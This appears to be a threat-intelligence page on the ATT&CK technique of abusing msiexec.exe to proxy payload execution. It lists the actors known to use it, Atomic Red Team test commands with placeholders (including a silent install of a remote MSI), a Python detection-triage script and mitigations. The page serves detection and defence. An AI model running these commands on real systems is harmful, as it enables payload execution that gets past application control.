ATT&CK Technique

Msiexec

T1218.007 · stealth

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.

Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.

Platforms: Windows

Actors Using This

13
Amavaldo · latin_america_brazilian_organized_cybercrime
Bitter · india
FIN7 · russia_speaking_cybercrime
Javali · latin_america_brazilian_organized_cybercrime
Mekotio · latin_america_brazilian_organized_cybercrime
Melcoz · latin_america_brazilian_organized_cybercrime
Mispadu / URSA · latin_america_brazilian_organized_cybercrime
Numando · latin_america_brazilian_organized_cybercrime
Ousaban · latin_america_brazilian_organized_cybercrime
SideCopy · pakistan
TA505 · russia_speaking_organized_cybercrime

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.

Atomic Tests

11
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
Msiexec.exe - Execute Local MSI file with embedded JScript (command_prompt · windows)
Executes an MSI containing embedded JScript code using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
Msiexec.exe - Execute Local MSI file with embedded VBScript (command_prompt · windows)
Executes an MSI containing embedded VBScript code using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
Msiexec.exe - Execute Local MSI file with an embedded DLL (command_prompt · windows)
Executes an MSI containing an embedded DLL using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
Msiexec.exe - Execute Local MSI file with an embedded EXE (command_prompt · windows)
Executes an MSI containing an embedded EXE using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
WMI Win32_Product Class - Execute Local MSI file with embedded JScript (powershell · windows)
Executes an MSI containing embedded JScript code using the WMI Win32_Product class
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
WMI Win32_Product Class - Execute Local MSI file with embedded VBScript (powershell · windows)
Executes an MSI containing embedded VBScript code using the WMI Win32_Product class
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
WMI Win32_Product Class - Execute Local MSI file with an embedded DLL (powershell · windows)
Executes an MSI containing an embedded DLL using the WMI Win32_Product class
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
WMI Win32_Product Class - Execute Local MSI file with an embedded EXE (powershell · windows)
Executes an MSI containing an embedded EXE using the WMI Win32_Product class
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
Msiexec.exe - Execute the DllRegisterServer function of a DLL (command_prompt · windows)
Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
#{msi_exe} /y "#{dll_payload}"
Msiexec.exe - Execute the DllUnregisterServer function of a DLL (command_prompt · windows)
Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
#{msi_exe} /z "#{dll_payload}"
Msiexec.exe - Execute Remote MSI file (command_prompt · windows)
Executes an arbitrary MSI file retrieved remotely. This is less commonly seen in legitimate application installation and commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
#{msi_exe} /q /i "#{msi_payload}"
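A triage pass over process-creation events that covers both the technique description above and the atomic tests, as an added example (not code from the page, from Atomic Red Team or from any Sigma rule). The events are constructed to mirror the tests with the #{...} placeholders filled in; every path, host name and heuristic threshold is an assumption.

```python
"""Triage process-creation events for msiexec.exe proxy execution (T1218.007).
Constructed example: events mirror the atomic tests above with #{...} placeholders
filled in with hypothetical paths; the heuristics below are assumptions."""
import re

TOKEN_RE = re.compile(r'"[^"]*"|\S+')        # keep a quoted path as one token
URL_RE = re.compile(r'^"?https?://', re.I)
INSTALL_ACTIONS = {"i", "a", "package"}       # msiexec install switches


def classify(image, cmdline):
    """Return the indicator names one event matches ([] = nothing seen)."""
    image = image.lower()
    tokens = TOKEN_RE.findall(cmdline)
    # Switches are /x or -x, case-insensitive; everything else is an argument.
    switches = {t[1:].lower() for t in tokens if t[:1] in "/-" and len(t) > 1}
    args = [t.strip('"').lower() for t in tokens if t[:1] not in "/-"]
    hits = []
    if image.endswith("msiexec.exe"):
        if switches & {"y", "z"}:             # /y, /z: DllRegisterServer / DllUnregisterServer
            hits.append("dll_load")
        if switches & INSTALL_ACTIONS:
            if any(URL_RE.match(t) for t in tokens):
                hits.append("remote_msi")     # package pulled over http(s)
            quiet = any(s.startswith("q") for s in switches)
            user_path = any("\\users\\" in a or "\\temp\\" in a for a in args)
            if quiet and user_path:           # silent install from a user-writable dir
                hits.append("quiet_user_path_install")
    elif image.endswith(("powershell.exe", "pwsh.exe")):
        # Win32_Product.Install hands the package to the installer service
        if re.search(r"win32_product.*install", cmdline, re.I):
            hits.append("wmi_win32_product_install")
    return hits


def triage(events):
    """Map event id -> indicators, keeping only events with at least one."""
    hits = {e["id"]: classify(e["image"], e["cmdline"]) for e in events}
    return {k: v for k, v in hits.items() if v}


MSIEXEC = r"C:\Windows\System32\msiexec.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed; every path and host is a hypothetical lab value
    {"id": 1, "image": MSIEXEC, "cmdline": r'msiexec.exe /q /i "C:\Users\lab\AppData\Local\Temp\t1218.msi"'},
    {"id": 2, "image": MSIEXEC, "cmdline": r'msiexec.exe /y "C:\Users\lab\Downloads\t1218.dll"'},
    {"id": 3, "image": MSIEXEC, "cmdline": r'msiexec.exe /q /i "http://lab.invalid/update.msi"'},
    {"id": 4, "image": PS, "cmdline": "powershell.exe Invoke-CimMethod -ClassName Win32_Product "
                                     "-MethodName Install -Arguments @{ PackageLocation = 'C:\\Users\\lab\\t1218.msi' }"},
    {"id": 5, "image": MSIEXEC, "cmdline": r'msiexec.exe /i "C:\Program Files\Vendor\setup.msi"'},  # benign
]
```

Event 5 produces no indicator on purpose: an interactive install of a package from Program Files is the baseline the other heuristics are measured against.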

Mitigations

2
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1026 Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation
Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1042 Disable or Remove Feature or Program

Disable or remove unnecessary and potentially vulnerable software, features, or services to reduce the attack surface and prevent abuse by adversaries. This involves identifying software or features that are no longer needed or that could be exploited and ensuring they are either removed or properly disabled.

Remove Legacy Software
  • Use Case: Disable or remove older versions of software that no longer receive updates or security patches (e.g., legacy Java, Adobe Flash).
  • Implementation: A company removes Flash Player from all employee systems after it has reached its end-of-life date.
Disable Unused Features
  • Use Case: Turn off unnecessary operating system features like SMBv1, Telnet, or RDP if they are not required.
  • Implementation: Disable SMBv1 in a Windows environment to mitigate vulnerabilities like EternalBlue.
Control Applications Installed by Users
  • Use Case: Prevent users from installing unauthorized software via group policies or other management tools.
  • Implementation: Block user installations of unauthorized file-sharing applications (e.g., BitTorrent clients) in an enterprise environment.
Remove Unnecessary Services
  • Use Case: Identify and disable unnecessary default services running on endpoints, servers, or network devices.
  • Implementation: Disable unused administrative shares (e.g., C$, ADMIN$) on workstations.
Restrict Add-ons and Plugins
  • Use Case: Remove or disable browser plugins and add-ons that are not needed for business purposes.
  • Implementation: Disable Java and ActiveX plugins in web browsers to prevent drive-by attacks.

Detection Coverage

1/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 9
Analytics (MITRE CAR) none
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin